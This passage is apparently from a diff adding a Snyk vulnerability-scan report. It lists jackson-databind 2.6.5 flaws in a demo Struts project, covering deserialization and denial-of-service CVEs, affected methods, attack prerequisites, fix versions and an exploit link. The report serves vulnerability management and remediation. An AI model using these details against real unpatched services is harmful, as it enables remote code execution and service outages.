"modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12086" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5ww9-j83m-q7qx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-05-19T10:19:10.287403Z", + "functions_new": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-17T18:12:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-05-17T18:12:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.785293Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.12.6.1", + "2.13.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when using nested objects." 
+ }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", + "className": "UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2816", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/3416", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.056720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", + "epssDetails": { + "percentile": "0.60309", + "probability": "0.00218", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36518" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-03-11T13:26:43.073121Z", + "functions_new": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": 
"com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-11T13:18:25Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-03-11T14:24:04Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.929583Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + 
"malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3582", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.201956Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", + "epssDetails": { + "percentile": "0.66401", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42004" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:21:18.588353Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:07:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T10:05:31.043255Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.261115Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "title": 
"Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", + "title": "Chromium Bugs" + }, + { + "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", + "title": "Documentation" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3590", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:53:57.258948Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.284440Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", + "epssDetails": { + "percentile": "0.65501", + "probability": "0.00252", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42003" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": 
"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:41:44.046865Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:22:10Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T09:54:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.258948Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.9)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.9" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": 
"com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1599", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.167922Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization 
of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", + "epssDetails": { + "percentile": "0.97700", + "probability": "0.57112", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-7525" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qxxx-2pp7-5hmx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-09-14T14:43:48.569000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + 
"className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-10T21:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-09-14T14:43:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.385289Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + 